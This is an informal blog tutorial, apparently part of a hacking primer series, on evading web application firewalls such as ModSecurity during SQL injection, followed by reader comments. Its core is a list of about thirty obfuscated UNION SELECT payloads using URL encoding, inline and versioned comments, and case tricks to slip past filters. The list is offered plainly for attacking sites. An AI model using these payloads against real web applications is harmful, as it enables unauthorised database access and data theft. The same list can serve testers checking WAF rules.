Hello Readers, Whats Up GentelMen?? Everything Fine??
Ah I Hope its Fine :)
As You Guyz Know That in My Evry Primer I've Started From Very Basics and Then Moved Toward Advanced Techniques and it Depends on the Structure of Target Method That if I Have to Explain it or Do it Practically , So Here is Now SQL INJECTION WEB APPLICATION FIREWALLS BYPASSING, and I Hope You Guyz Will Like it Very Much :)
So Lets Start Without Wasting Time,, Right?? Ook ..
Hands on: Lets Begin
KEEP IN MIND THAT THESE WAF's ACTUALLY DEPEND ON SCENARIO THAT HOW WE HAVE TO USE THEM
Lecture #1
IntroDuction to WAFs and Why We Have to ByPASS Them?
Lecture #2
ByPassing Mod_Security and Some Common Union Select Queries
Some Common Union Select Queries are Given Below Which Can be usually Used .
- %55nion(%53elect 1,2,3)-- -
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- /**/UNION/**//*!50000SELECT*//**/
- /*!50000UniON SeLeCt*/
- union /*!50000%53elect*/
- +#uNiOn+#sEleCt
- +#1q%0AuNiOn all#qa%0A#%0AsEleCt
- /*!%55NiOn*/ /*!%53eLEct*/
- /*!u%6eion*/ /*!se%6cect*/
- +un/**/ion+se/**/lect
- uni%0bon+se%0blect
- %2f**%2funion%2f**%2fselect
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- REVERSE(noinu)+REVERSE(tceles)
- /*--*/union/*--*/select/*--*/
- union (/*!/**/ SeleCT */ 1,2,3)
- /*!union*/+/*!select*/
- union+/*!select*/
- /**/union/**/select/**/
- /**/uNIon/**/sEleCt/**/
- /**//*!union*//**//*!select*//**/
- /*!uNIOn*/ /*!SelECt*/
- +union+distinct+select+
- +union+distinctROW+select+
- uNiOn aLl sElEcT
Lecture #3
WAF ByPass Using SQLMAP
To Be Continued..!!!
SQLi WAF ByPASSing Primer - UrduSecurity Project
Views:
336
I never Thought sqlmap can be help ful but u showed me a way , thnx admin waiting for more things to learn from you. Nice
ReplyDeleteThanks For Your Feed Back, Subscribe to Blog for More Upcoming Videos :)
Deletekeep it up and keep making good videos :)
ReplyDeleteThanks For Your Feed Back, Subscribe to Blog for More Upcoming Videos :)
DeletePLZ post WAF ByPass Using SQLMAP in HD plz :)
ReplyDeleteMention Your Email , i'll Send it
DeleteThnx Dear.. Nyc Tut.. This Iz my Email plzz send me upcomming Videos Irfanhussain0334@gmail.com
ReplyDeleteAwsome Tut :) Bro !!!!
ReplyDeleteKindly Compelte It with Advance Inejection :) And Post method !!!
M waiting For Ur Tut :) With Love <3